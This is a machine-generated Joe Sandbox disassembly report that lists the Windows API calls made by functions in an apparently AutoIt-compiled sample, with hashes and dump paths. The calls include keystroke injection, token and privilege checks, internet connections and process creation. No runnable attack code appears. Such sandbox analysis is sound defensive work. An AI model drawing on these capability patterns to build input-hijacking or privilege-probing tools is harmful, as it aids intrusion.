                                                            • SetKeyboardState.USER32(00000080,?,00000001), ref: 00871053
                                                            • PostMessageW.USER32(00000000,00000102,00000001,00000001), ref: 008710B9
                                                            • SendInput.USER32(00000001,00000000,0000001C,00000000,?,00000001), ref: 0087110B
                                                            Similarity
                                                            • API ID: KeyboardState$InputMessagePostSend
                                                            APIs
                                                            • GetKeyboardState.USER32(?,7694C0D0,?,00008000), ref: 00871176
                                                            • SetKeyboardState.USER32(00000080,?,00008000), ref: 00871192
                                                            • PostMessageW.USER32(00000000,00000101,00000000), ref: 008711F1
                                                            • SendInput.USER32(00000001,?,0000001C,7694C0D0,?,00008000), ref: 00871243
                                                            Similarity
                                                            • API ID: KeyboardState$InputMessagePostSend
                                                            APIs
                                                            • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 0084644B
                                                            • __isleadbyte_l.LIBCMT ref: 00846479
                                                            • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 008464A7
                                                            • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 008464DD
                                                            Similarity
                                                            • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                            APIs
                                                            • GetForegroundWindow.USER32 ref: 00895189
                                                              • Part of subcall function 0087387D: GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00873897
                                                              • Part of subcall function 0087387D: GetCurrentThreadId.KERNEL32 ref: 0087389E
                                                              • Part of subcall function 0087387D: AttachThreadInput.USER32(00000000,?,008752A7), ref: 008738A5
                                                            • GetCaretPos.USER32(?), ref: 0089519A
                                                            • ClientToScreen.USER32(00000000,?), ref: 008951D5
                                                            • GetForegroundWindow.USER32 ref: 008951DB
                                                            Similarity
                                                            • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                            APIs
                                                              • Part of subcall function 00812612: GetWindowLongW.USER32(?,000000EB), ref: 00812623
                                                            • GetCursorPos.USER32(?), ref: 0089C7C2
                                                            • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,0084BBFB,?,?,?,?,?), ref: 0089C7D7
                                                            • GetCursorPos.USER32(?), ref: 0089C824
                                                            • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,0084BBFB,?,?,?), ref: 0089C85E
                                                            Similarity
                                                            • API ID: Cursor$LongMenuPopupProcTrackWindow
                                                            APIs
                                                              • Part of subcall function 00868652: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00868669
                                                              • Part of subcall function 00868652: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00868673
                                                              • Part of subcall function 00868652: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00868682
                                                              • Part of subcall function 00868652: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00868689
                                                              • Part of subcall function 00868652: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 0086869F
                                                            • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 00868BEB
                                                            • _memcmp.LIBCMT ref: 00868C0E
                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00868C44
                                                            • HeapFree.KERNEL32(00000000), ref: 00868C4B
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                             • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
                                                            • String ID:
                                                            • API String ID: 1592001646-0
                                                            • Opcode ID: cbc56eca4299577791d39b43c26a314f02c96e1381380e7a5785fd3268458029
                                                            • Instruction ID: 1cfb930e0646631ace88a0fb250f69ab3bf7bd40dab8046b46a0c1203e4daba2
                                                            • Opcode Fuzzy Hash: cbc56eca4299577791d39b43c26a314f02c96e1381380e7a5785fd3268458029
                                                            • Instruction Fuzzy Hash: D6219A71E01208EFCB04DFA4C949BEEB7B8FF44350F1A4159E558E7241EB31AA06DBA0
                                                            APIs
                                                            • __setmode.LIBCMT ref: 00830BF2
                                                              • Part of subcall function 00815B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00877B20,?,?,00000000), ref: 00815B8C
                                                              • Part of subcall function 00815B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00877B20,?,?,00000000,?,?), ref: 00815BB0
                                                            • _fprintf.LIBCMT ref: 00830C29
                                                            • OutputDebugStringW.KERNEL32(?), ref: 00866331
                                                              • Part of subcall function 00834CDA: _flsall.LIBCMT ref: 00834CF3
                                                            • __setmode.LIBCMT ref: 00830C5E
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                             • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: ByteCharMultiWide__setmode$DebugOutputString_flsall_fprintf
                                                            • String ID:
                                                            • API String ID: 521402451-0
                                                            • Opcode ID: b8c7080a5ee12267b15b6dde058f343f30b4b4dd210767fc97a3358fd35072fa
                                                            • Instruction ID: 623f6e38e31802da4d602d95e8d5fb16e1ce1e620b6ba14e320ebcf4d2b8286a
                                                            • Opcode Fuzzy Hash: b8c7080a5ee12267b15b6dde058f343f30b4b4dd210767fc97a3358fd35072fa
                                                            • Instruction Fuzzy Hash: B8112732904208AACB0477BC9C47AFE7B6DFFC1320F14111AF204D7292EE216D9247D2
                                                            APIs
                                                            • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00881A97
                                                              • Part of subcall function 00881B21: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00881B40
                                                              • Part of subcall function 00881B21: InternetCloseHandle.WININET(00000000), ref: 00881BDD
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                             • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: Internet$CloseConnectHandleOpen
                                                            • String ID:
                                                            • API String ID: 1463438336-0
                                                            • Opcode ID: f7618d70fca7c94e6f19622282961c9bbd7a6a9514d598513c6b47fbce227f58
                                                            • Instruction ID: 47671cd6c60866e27cf7a8b81baa45c8963d25830360b031873ed260774e8f60
                                                            • Opcode Fuzzy Hash: f7618d70fca7c94e6f19622282961c9bbd7a6a9514d598513c6b47fbce227f58
                                                            • Instruction Fuzzy Hash: 4E21D135201604BFDB15BF60CC09FBAB7ADFF44711F14001AFA02D6651EB31D8129BA0
                                                            APIs
                                                              • Part of subcall function 0086F5AD: lstrlenW.KERNEL32(?,00000002,?,?,000000EF,?,0086E1C4,?,?,?,0086EFB7,00000000,000000EF,00000119,?,?), ref: 0086F5BC
                                                              • Part of subcall function 0086F5AD: lstrcpyW.KERNEL32(00000000,?), ref: 0086F5E2
                                                              • Part of subcall function 0086F5AD: lstrcmpiW.KERNEL32(00000000,?,0086E1C4,?,?,?,0086EFB7,00000000,000000EF,00000119,?,?), ref: 0086F613
                                                            • lstrlenW.KERNEL32(?,00000002,?,?,?,?,0086EFB7,00000000,000000EF,00000119,?,?,00000000), ref: 0086E1DD
                                                            • lstrcpyW.KERNEL32(00000000,?), ref: 0086E203
                                                            • lstrcmpiW.KERNEL32(00000002,cdecl,?,0086EFB7,00000000,000000EF,00000119,?,?,00000000), ref: 0086E237
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                             • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: lstrcmpilstrcpylstrlen
                                                            • String ID: cdecl
                                                            • API String ID: 4031866154-3896280584
                                                            • Opcode ID: 5ea64f0d0ea116f37f96c18c679815c0debc26b6f977feb0b4488492c2ea373c
                                                            • Instruction ID: 884470336c10d2c8a8b477d47ec2926bc11d8ffb8502cbf0f312752da83a9c6a
                                                            • Opcode Fuzzy Hash: 5ea64f0d0ea116f37f96c18c679815c0debc26b6f977feb0b4488492c2ea373c
                                                            • Instruction Fuzzy Hash: AD11B13A100305EFCB25AF68D849D7A77A9FF84350B45402AF916CB2A4EB71D8509791
                                                            APIs
                                                            • _free.LIBCMT ref: 00845351
                                                              • Part of subcall function 0083594C: __FF_MSGBANNER.LIBCMT ref: 00835963
                                                              • Part of subcall function 0083594C: __NMSG_WRITE.LIBCMT ref: 0083596A
                                                              • Part of subcall function 0083594C: RtlAllocateHeap.NTDLL(017B0000,00000000,00000001,00000000,?,?,?,00831013,?), ref: 0083598F
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                             • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: AllocateHeap_free
                                                            • String ID:
                                                            • API String ID: 614378929-0
                                                            • Opcode ID: 30678ed73a5c8e16391aadad02be968ac7d6957a184b0572f76cb92f4af1465e
                                                            • Instruction ID: e4ab5f50f0a4e1a75962dd52bce7284ca615ce5a856c2a04ddd0d09b392c4a62
                                                            • Opcode Fuzzy Hash: 30678ed73a5c8e16391aadad02be968ac7d6957a184b0572f76cb92f4af1465e
                                                            • Instruction Fuzzy Hash: 4611CE32504B1DEFCB313F78EC0566E3B98FF523A0F24052AF945DA2A2DEB58D409691
                                                            APIs
                                                            • _memset.LIBCMT ref: 00814560
                                                              • Part of subcall function 0081410D: _memset.LIBCMT ref: 0081418D
                                                              • Part of subcall function 0081410D: _wcscpy.LIBCMT ref: 008141E1
                                                              • Part of subcall function 0081410D: Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 008141F1
                                                            • KillTimer.USER32(?,00000001,?,?), ref: 008145B5
                                                            • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 008145C4
                                                            • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 0084D6CE
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                             • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
                                                            • String ID:
                                                            • API String ID: 1378193009-0
                                                            • Opcode ID: dd009ec66882f0d8ea27ed569281b47e154f379ae9e645c12a81a41eec0cbee2
                                                            • Instruction ID: 62ae0452f8e53f9926c8559331047ee60a1090b2836aa5a59c30c31c80afe789
                                                            • Opcode Fuzzy Hash: dd009ec66882f0d8ea27ed569281b47e154f379ae9e645c12a81a41eec0cbee2
                                                            • Instruction Fuzzy Hash: 3221D770904788AFEB328B24DC55BE7BBEDFF11308F04009EE69ED6242C7745A858B91
                                                            APIs
                                                              • Part of subcall function 00815B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00877B20,?,?,00000000), ref: 00815B8C
                                                              • Part of subcall function 00815B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00877B20,?,?,00000000,?,?), ref: 00815BB0
                                                            • gethostbyname.WSOCK32(?,?,?), ref: 008866AC
                                                            • WSAGetLastError.WSOCK32(00000000), ref: 008866B7
                                                            • _memmove.LIBCMT ref: 008866E4
                                                            • inet_ntoa.WSOCK32(?), ref: 008866EF
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                             • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: ByteCharMultiWide$ErrorLast_memmovegethostbynameinet_ntoa
                                                            • String ID:
                                                            • API String ID: 1504782959-0
                                                            • Opcode ID: 0ec53530888bbacd4a0a3f6ba8abf4c6558dab5fb09814cbefa3bbfeea6a6f32
                                                            • Instruction ID: 34d4046cff163cf3f2bb30f723007c944b8eee6579273df20d31604e554d68df
                                                            • Opcode Fuzzy Hash: 0ec53530888bbacd4a0a3f6ba8abf4c6558dab5fb09814cbefa3bbfeea6a6f32
                                                            • Instruction Fuzzy Hash: D7113D75604509EBCB04FBA8D996DEE77B9FF44310B144065F502E7162EB309E548B92
                                                            APIs
                                                            • SendMessageW.USER32(?,000000B0,?,?), ref: 00869043
                                                            • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00869055
                                                            • SendMessageW.USER32(?,000000C9,?,00000000), ref: 0086906B
                                                            • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00869086
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                             • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: MessageSend
                                                            • String ID:
                                                            • API String ID: 3850602802-0
                                                            • Opcode ID: 2508fbcf9aa49f42188ef6867eb49759d970f8bba2ee3420d0ff1233bd7bc5da
                                                            • Instruction ID: 9c0c7b5658bfe867337331e80e99eecb4d1d42fe59af88322683e0645f317512
                                                            • Opcode Fuzzy Hash: 2508fbcf9aa49f42188ef6867eb49759d970f8bba2ee3420d0ff1233bd7bc5da
                                                            • Instruction Fuzzy Hash: 11115E79900218FFDB11DFA5CD84E9DBBB8FB48310F214095EA04B7290D6716E10DB90
                                                            APIs
                                                              • Part of subcall function 00812612: GetWindowLongW.USER32(?,000000EB), ref: 00812623
                                                            • DefDlgProcW.USER32(?,00000020,?), ref: 008112D8
                                                            • GetClientRect.USER32(?,?), ref: 0084B84B
                                                            • GetCursorPos.USER32(?), ref: 0084B855
                                                            • ScreenToClient.USER32(?,?), ref: 0084B860
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                             • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: Client$CursorLongProcRectScreenWindow
                                                            • String ID:
                                                            • API String ID: 4127811313-0
                                                            • Opcode ID: ac7bef8cfc7d5dc44dcf23e4149587ffdbb5cf6bbc335cc1a665f41fcbc2941a
                                                            • Instruction ID: 7c143e0d89f2d45a29e58e8f7973dbc4957904d874c32c5bdc868e43b85055bf
                                                            • Opcode Fuzzy Hash: ac7bef8cfc7d5dc44dcf23e4149587ffdbb5cf6bbc335cc1a665f41fcbc2941a
                                                            • Instruction Fuzzy Hash: 6C111335A01119AFCF14EFA8D8899EE77B8FF06301F100466EA11E7251D734AA918BA6
                                                            APIs
                                                            • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,008701FD,?,00871250,?,00008000), ref: 0087166F
                                                            • Sleep.KERNEL32(00000000,?,?,?,?,?,?,008701FD,?,00871250,?,00008000), ref: 00871694
                                                            • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,008701FD,?,00871250,?,00008000), ref: 0087169E
                                                            • Sleep.KERNEL32(?,?,?,?,?,?,?,008701FD,?,00871250,?,00008000), ref: 008716D1
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                             • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: CounterPerformanceQuerySleep
                                                            • String ID:
                                                            • API String ID: 2875609808-0
                                                            • Opcode ID: ffe37f46069e11f29ad9589e6ad9c75fc79eea494a29fb26c87d9131cb4762a0
                                                            • Instruction ID: 9a4a1349a33bef8820c9995f85c9c19ba586817af68c8741934a8b7d74297761
                                                            • Opcode Fuzzy Hash: ffe37f46069e11f29ad9589e6ad9c75fc79eea494a29fb26c87d9131cb4762a0
                                                            • Instruction Fuzzy Hash: D6118231C0851DDBCF04AFA9D848AEEBB78FF19701F098056DA84F2244CB3095508BD6
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                             • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                            • String ID:
                                                            • API String ID: 3016257755-0
                                                            APIs
                                                            • GetWindowRect.USER32(?,?), ref: 0089B59E
                                                            • ScreenToClient.USER32(?,?), ref: 0089B5B6
                                                            • ScreenToClient.USER32(?,?), ref: 0089B5DA
                                                            • InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 0089B5F5
                                                            Similarity
                                                            • API ID: ClientRectScreen$InvalidateWindow
                                                            • String ID:
                                                            • API String ID: 357397906-0
                                                            APIs
                                                            • _memset.LIBCMT ref: 0089B8FE
                                                            • _memset.LIBCMT ref: 0089B90D
                                                            • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,008D7F20,008D7F64), ref: 0089B93C
                                                            • CloseHandle.KERNEL32 ref: 0089B94E
                                                            Similarity
                                                            • API ID: _memset$CloseCreateHandleProcess
                                                            • String ID:
                                                            • API String ID: 3277943733-0
                                                            APIs
                                                            • EnterCriticalSection.KERNEL32(?), ref: 00876E88
                                                              • Part of subcall function 0087794E: _memset.LIBCMT ref: 00877983
                                                            • _memmove.LIBCMT ref: 00876EAB
                                                            • _memset.LIBCMT ref: 00876EB8
                                                            • LeaveCriticalSection.KERNEL32(?), ref: 00876EC8
                                                            Similarity
                                                            • API ID: CriticalSection_memset$EnterLeave_memmove
                                                            • String ID:
                                                            • API String ID: 48991266-0
                                                            APIs
                                                              • Part of subcall function 008112F3: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 0081134D
                                                              • Part of subcall function 008112F3: SelectObject.GDI32(?,00000000), ref: 0081135C
                                                              • Part of subcall function 008112F3: BeginPath.GDI32(?), ref: 00811373
                                                              • Part of subcall function 008112F3: SelectObject.GDI32(?,00000000), ref: 0081139C
                                                            • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 0089C030
                                                            • LineTo.GDI32(00000000,?,?), ref: 0089C03D
                                                            • EndPath.GDI32(00000000), ref: 0089C04D
                                                            • StrokePath.GDI32(00000000), ref: 0089C05B
                                                            Similarity
                                                            • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                                                            • String ID:
                                                            • API String ID: 1539411459-0
                                                            APIs
                                                            • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 0086A399
                                                            • GetWindowThreadProcessId.USER32(?,00000000), ref: 0086A3AC
                                                            • GetCurrentThreadId.KERNEL32 ref: 0086A3B3
                                                            • AttachThreadInput.USER32(00000000), ref: 0086A3BA
                                                            Similarity
                                                            • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                                            • String ID:
                                                            • API String ID: 2710830443-0
                                                            APIs
                                                            • GetSysColor.USER32(00000008), ref: 00812231
                                                            • SetTextColor.GDI32(?,000000FF), ref: 0081223B
                                                            • SetBkMode.GDI32(?,00000001), ref: 00812250
                                                            • GetStockObject.GDI32(00000005), ref: 00812258
                                                            • GetWindowDC.USER32(?,00000000), ref: 0084C0D3
                                                            • GetPixel.GDI32(00000000,00000000,00000000), ref: 0084C0E0
                                                            • GetPixel.GDI32(00000000,?,00000000), ref: 0084C0F9
                                                            • GetPixel.GDI32(00000000,00000000,?), ref: 0084C112
                                                            • GetPixel.GDI32(00000000,?,?), ref: 0084C132
                                                            • ReleaseDC.USER32(?,00000000), ref: 0084C13D
                                                            Similarity
                                                            • API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
                                                            • String ID:
                                                            • API String ID: 1946975507-0
                                                            APIs
                                                            • GetCurrentThread.KERNEL32 ref: 00868C63
                                                            • OpenThreadToken.ADVAPI32(00000000,?,?,?,0086882E), ref: 00868C6A
                                                            • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,0086882E), ref: 00868C77
                                                            • OpenProcessToken.ADVAPI32(00000000,?,?,?,0086882E), ref: 00868C7E
                                                            Similarity
                                                            • API ID: CurrentOpenProcessThreadToken
                                                            • String ID:
                                                            • API String ID: 3974789173-0
                                                            APIs
                                                            • GetDesktopWindow.USER32 ref: 00852187
                                                            • GetDC.USER32(00000000), ref: 00852191
                                                            • GetDeviceCaps.GDI32(00000000,0000000C), ref: 008521B1
                                                            • ReleaseDC.USER32(?), ref: 008521D2
                                                            Similarity
                                                            • API ID: CapsDesktopDeviceReleaseWindow
                                                            • String ID:
                                                            • API String ID: 2889604237-0
                                                            APIs
                                                            • GetDesktopWindow.USER32 ref: 0085219B
                                                            • GetDC.USER32(00000000), ref: 008521A5
                                                            • GetDeviceCaps.GDI32(00000000,0000000C), ref: 008521B1
                                                            • ReleaseDC.USER32(?), ref: 008521D2
                                                            Similarity
                                                            • API ID: CapsDesktopDeviceReleaseWindow
                                                            • String ID:
                                                            • API String ID: 2889604237-0
                                                            APIs
                                                            • OleSetContainedObject.OLE32(?,00000001), ref: 0086B981
                                                            Strings
                                                            Similarity
                                                            • API ID: ContainedObject
                                                            • String ID: AutoIt3GUI$Container
                                                            • API String ID: 3565006973-3941886329
                                                            APIs
                                                              • Part of subcall function 0082FEC6: _wcscpy.LIBCMT ref: 0082FEE9
                                                              • Part of subcall function 00819997: __itow.LIBCMT ref: 008199C2
                                                              • Part of subcall function 00819997: __swprintf.LIBCMT ref: 00819A0C
                                                            • __wcsnicmp.LIBCMT ref: 0087B298
                                                            • WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 0087B361
                                                            Strings
                                                            Similarity
                                                            • API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
                                                            • String ID: LPT
                                                            • API String ID: 3222508074-1350329615
                                                            • Opcode ID: 56d517149ea095d68f347bfe7f8b5e5bf06081bc727e35fe5c79f6dc4dee9484
                                                            • Instruction ID: 5145d93f513172b7d75eb66e2c54fa64477fba4be23c344e0f721254aa35a82b
                                                            • Opcode Fuzzy Hash: 56d517149ea095d68f347bfe7f8b5e5bf06081bc727e35fe5c79f6dc4dee9484
                                                            • Instruction Fuzzy Hash: FB614C75A04219AFCB14DB98C895EAEB7B5FF08310F11806AF54AEB351DB70EE80CB51
                                                            APIs
                                                            • Sleep.KERNEL32(00000000), ref: 00822AC8
                                                            • GlobalMemoryStatusEx.KERNEL32(?), ref: 00822AE1
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmp
